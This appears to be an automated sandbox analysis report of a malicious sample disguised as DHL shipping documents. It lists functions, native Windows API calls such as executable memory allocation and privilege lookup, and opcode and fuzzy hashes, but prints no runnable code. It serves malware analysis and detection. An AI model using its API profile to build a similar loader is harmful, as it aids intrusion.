Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A35A Relevance: 1.5, APIs: 1, Instructions: 44
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d73749ef78733838fea45bcdc92a14f2b3dff8ae92e6b725c5898be73315d8bb
Instruction ID: 698b590c25077f763a7e0fb4d2be75b8b946fa37642a576d78d55a5fc828816c
Opcode Fuzzy Hash: d73749ef78733838fea45bcdc92a14f2b3dff8ae92e6b725c5898be73315d8bb
Instruction Fuzzy Hash: 3D01BBB6201208AFDB44CF88DC95EEB77A9EF8C754F158248FA1DD7241D630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A53C Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c6ac7ca66a5373972f114248ec97dafb7b49e3b2a2a8d0f8b29591c3f71409b7
Instruction ID: 0136db5c8f0074a2002d9ac5a9546610f26a824a5a879bd9030ef83f0ade5a35
Opcode Fuzzy Hash: c6ac7ca66a5373972f114248ec97dafb7b49e3b2a2a8d0f8b29591c3f71409b7
Instruction Fuzzy Hash: B5F015B2200208AFCB14DF89DC81EEB77ADEF8C754F158549FE0997245C630E921CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A48A Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6a4237c715a52ed0029e61aef7a979a12abe77984df01b292c0eea2a69658cb1
Instruction ID: f61badf6dee101853dd7fc1c0e1ca724bd08b36586451d7a292599a1cee45348
Opcode Fuzzy Hash: 6a4237c715a52ed0029e61aef7a979a12abe77984df01b292c0eea2a69658cb1
Instruction Fuzzy Hash: 69E026392002007FC710DBA4CC45FD73F25FF48350F18405CB90D9B202C530E6008690

Uniqueness

Uniqueness Score: -1.00%

Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01512B20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512B2A

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b1a4fa9f704923b9c6aadd7142c2acf7a3b22bc2cd02f5334d5db550b74cc29b
Instruction ID: 90ac0f79e9bfa8b2d4c4625b9f809eeba05798dc3896f67af9eb2016d8774291
Opcode Fuzzy Hash: b1a4fa9f704923b9c6aadd7142c2acf7a3b22bc2cd02f5334d5db550b74cc29b
Instruction Fuzzy Hash: 3D90026261201003411571984415616448AA7E1211B51C421E1014994DCA6588D16225

Uniqueness

Uniqueness Score: -1.00%

Function 01512BB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512BBA

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 671728ba0f11c428fadcf2e9876b1942407f6a03a4e09c09aefda63c359f2d6c
Instruction ID: 90268e1402685a522f15fd3dc4f82d56e98ca63b00f11ca93323df6a14362417
Opcode Fuzzy Hash: 671728ba0f11c428fadcf2e9876b1942407f6a03a4e09c09aefda63c359f2d6c
Instruction Fuzzy Hash: 4190023261101802D1907198440564A0485A7D2311F91C415E0025A58DCF558A9977A1

Uniqueness

Uniqueness Score: -1.00%

Function 01512A90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512A9A

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8337555e0696c97178e637fdd7128c8a6a446277c17f4813c3ce4405e4b4f579
Instruction ID: 762378792364813bc1cf8c33ab16fce4fa1e00686e7c6d8c82cc08663d94b47c
Opcode Fuzzy Hash: 8337555e0696c97178e637fdd7128c8a6a446277c17f4813c3ce4405e4b4f579
Instruction Fuzzy Hash: 2A900226621010030115A598070550704C6A7D6361351C421F1015954CDB6188A15221

Uniqueness

Uniqueness Score: -1.00%

Function 01512D90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512D9A

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7814992faae402e3ea5b489a2b1b7c936ebcea577bab0f4cdc5fcabb3676d40e
Instruction ID: 91a91d91fd237831ca082d6f5a9617afa38386d4106787f4af8672b264158ca6
Opcode Fuzzy Hash: 7814992faae402e3ea5b489a2b1b7c936ebcea577bab0f4cdc5fcabb3676d40e
Instruction Fuzzy Hash: FE900222652051525555B19844055074486B7E1251791C412E1414D54CCA669896D721

Uniqueness

Uniqueness Score: -1.00%

Function 01512DB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512DBA

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3627aa71e690d20a0f516c3240640598c32141b83a5ed7b1104bf4791080b7d
Instruction ID: 590b52c422d080432e310cf2e734686c1b5454c83016d1ff5cb57912d9935347
Opcode Fuzzy Hash: f3627aa71e690d20a0f516c3240640598c32141b83a5ed7b1104bf4791080b7d
Instruction Fuzzy Hash: F790023261101413D121619845057070489A7D1251F91C812E042495CDDB968992A221

Uniqueness

Uniqueness Score: -1.00%

Function 01512C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512C6A

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0a3a609b2f2bc485ee82e99d6a1146c951a901f6f7199b076d2d0ae0439dbbfc
Instruction ID: ced9c47fc664862cd5c7a138dc1de0818e870d9d3905ced2b25e2f80574b5abf
Opcode Fuzzy Hash: 0a3a609b2f2bc485ee82e99d6a1146c951a901f6f7199b076d2d0ae0439dbbfc
Instruction Fuzzy Hash: 6E90023261101402D11065D854096460485A7E1311F51D411E5024959ECBA588D16231

Uniqueness

Uniqueness Score: -1.00%

Function 01512C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512C3A

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dc854fcf6534aaab3f5b184de0c95b52626b006bb3a68f103ce5056ea31cc740
Instruction ID: a2f3e2a24c0322390c0f09fb28b576d0889b02312c62e62a8ba049ff315cdf10
Opcode Fuzzy Hash: dc854fcf6534aaab3f5b184de0c95b52626b006bb3a68f103ce5056ea31cc740
Instruction Fuzzy Hash: 2290023261109802D1206198840574A0485A7D1311F55C811E4424A5CDCBD588D17221

Uniqueness

Uniqueness Score: -1.00%

Function 01512CD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512CDA

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 370be15b61e2e2d929a138ab1c0f543726206949bb06a5f246ab2ebf24ba049c
Instruction ID: 7d0909c4e023652ac4d8ba44cf7f9d7b4e0729045bd1a92661cffd160def4290
Opcode Fuzzy Hash: 370be15b61e2e2d929a138ab1c0f543726206949bb06a5f246ab2ebf24ba049c
Instruction Fuzzy Hash: 6690022A62301002D1907198540960A0485A7D2212F91D815E001595CCCE5588A95321

Uniqueness

Uniqueness Score: -1.00%

Function 01512CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512CFA

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55c84faae808ed5355132b838e5bc946d0e1a807f1b6e126d5c99cfc161cbf51
Instruction ID: f2d23c2613c1da1f93781f5c8118fbd49611c24b1f8b796712a4cf60c0cb1617
Opcode Fuzzy Hash: 55c84faae808ed5355132b838e5bc946d0e1a807f1b6e126d5c99cfc161cbf51
Instruction Fuzzy Hash: FB90022271101003D150719854196064485F7E2311F51D411E0414958CDE5588965322

Uniqueness

Uniqueness Score: -1.00%

Function 01512F50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512F5A

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b572d64cfbffd8a9a67c05c786a7e88911c6766b04d6cc77534dc0db3744ad07
Instruction ID: 0ec55453c670427a67536a426cd56a16f6b8f6623a241b92be7c7d672be6971b
Opcode Fuzzy Hash: b572d64cfbffd8a9a67c05c786a7e88911c6766b04d6cc77534dc0db3744ad07
Instruction Fuzzy Hash: F890023261141402D1106198481570B0485A7D1312F51C411E1164959DCB6588916671

Uniqueness

Uniqueness Score: -1.00%

Function 01512F70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512F7A

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 76479609e2a5235bc3ac17596ca1656eb54ae5a8be6e12fa9a89e28d2f2b2765
Instruction ID: 7d5d7846a4398d31cab20063741630fc2efe033191e46308d5078a860a1dd181
Opcode Fuzzy Hash: 76479609e2a5235bc3ac17596ca1656eb54ae5a8be6e12fa9a89e28d2f2b2765
Instruction Fuzzy Hash: 52900222A1101042415071A888459064485BBE2221751C521E0998954DCA9988A55765

Uniqueness

Uniqueness Score: -1.00%

Function 01512FA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512FAA

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0cbc065dc59e47810063e19acfe38cd326eeeb6ab4cc8f39d4bb10c3cb7c3325
Instruction ID: 57ab713c9fa1d9e05cea886794506823d2ac8e68bfa5e14b8c0cd6dca9397b4d
Opcode Fuzzy Hash: 0cbc065dc59e47810063e19acfe38cd326eeeb6ab4cc8f39d4bb10c3cb7c3325
Instruction Fuzzy Hash: 6E90022262181042D21065A84C15B070485A7D1313F51C515E0154958CCE5588A15621

Uniqueness

Uniqueness Score: -1.00%

Function 01512E40 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512E4A

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e97c5afe6e945c9a5e4fd8a34473efa8b4b8328aa27feea97c0eef6b600c2532
Instruction ID: b32ae4d2b8fcb3198b3f0cb24831384994405247fa67a0eb6de8ec23f7d97825
Opcode Fuzzy Hash: e97c5afe6e945c9a5e4fd8a34473efa8b4b8328aa27feea97c0eef6b600c2532
Instruction Fuzzy Hash: C0900222A1101502D11171984405616048AA7D1251F91C422E1024959ECF6589D2A231

Uniqueness

Uniqueness Score: -1.00%

Function 01512E60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512E6A

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 906b385d2527b519881bb2eaa4f60040c57f0f9c2ce636aec7a94f29f6d98f0f
Instruction ID: 0abcf0f75162eaa5823cf46340d9f84361eb42348fb2722e1bd01c5885ed6337
Opcode Fuzzy Hash: 906b385d2527b519881bb2eaa4f60040c57f0f9c2ce636aec7a94f29f6d98f0f
Instruction Fuzzy Hash: 9B90027261101402D150719844057460485A7D1311F51C411E5064958ECB998DD56765

Uniqueness

Uniqueness Score: -1.00%

Function 01512EF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01512EFA

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6afaaa2810ca9372cb7841f6e4fdba10424c0a97955e146f4147e77d13209c01
Instruction ID: fd329a46019673586e4b4314e2cd8cda4b5736e98f655df004891312ef7aaf7b
Opcode Fuzzy Hash: 6afaaa2810ca9372cb7841f6e4fdba10424c0a97955e146f4147e77d13209c01
Instruction Fuzzy Hash: 8F90026275101442D11061984415B060485E7E2311F51C415E1064958DCB59CC926226

Uniqueness

Uniqueness Score: -1.00%

Function 00409AB0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D

Strings

6EA, xrefs: 0041A652, 0041A65C

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 6EA
API String ID: 1279760036-1400015478
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0040830F Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: fde72f411f07b4535d77d3267e3dcf1b5004f2104a041c4aa74d3972f0255f21
Instruction ID: 5ec4dca331bfd2914afdd3f7b0bd3893ce4a579e4a5e60b5419bf648e843aff3
Opcode Fuzzy Hash: fde72f411f07b4535d77d3267e3dcf1b5004f2104a041c4aa74d3972f0255f21
Instruction Fuzzy Hash: 2E01F731A8032C7AE720A6949D43FFE672CAB40F55F04011EFF04FA1C2D6B8690646E9

Uniqueness

Uniqueness Score: -1.00%

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A663 Relevance: 1.5, APIs: 1, Instructions: 31
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: afcdd7e0d23a0165a9a57f4380670875c59ec9c32e9f3ab00aa502653038fbab
Instruction ID: 21cdd5c8b5c96ac1149db5ebfa56ec43eee72cacba08efdb4a04fe6f0a3ba3b0
Opcode Fuzzy Hash: afcdd7e0d23a0165a9a57f4380670875c59ec9c32e9f3ab00aa502653038fbab
Instruction Fuzzy Hash: 16F0E5B02002047BDB18DF55CC45FEB7768FF88320F214159FD1A9B251C231D811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7CD Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: e848674adcae5c7f2ddfeb2ec2b43f4cdf83a2b4a11ec677ea363c759a147657
Instruction ID: d9ec41557bc3ab7d9c8641d0b3f4de332919b25aefa140eb1757099db8600bf3
Opcode Fuzzy Hash: e848674adcae5c7f2ddfeb2ec2b43f4cdf83a2b4a11ec677ea363c759a147657
Instruction Fuzzy Hash: C5E09AB16002087BDB20DF59CC80EEB3BA8EF89250F108169F90DA7642C530A8128BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_DHL_Shipping_Documents.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
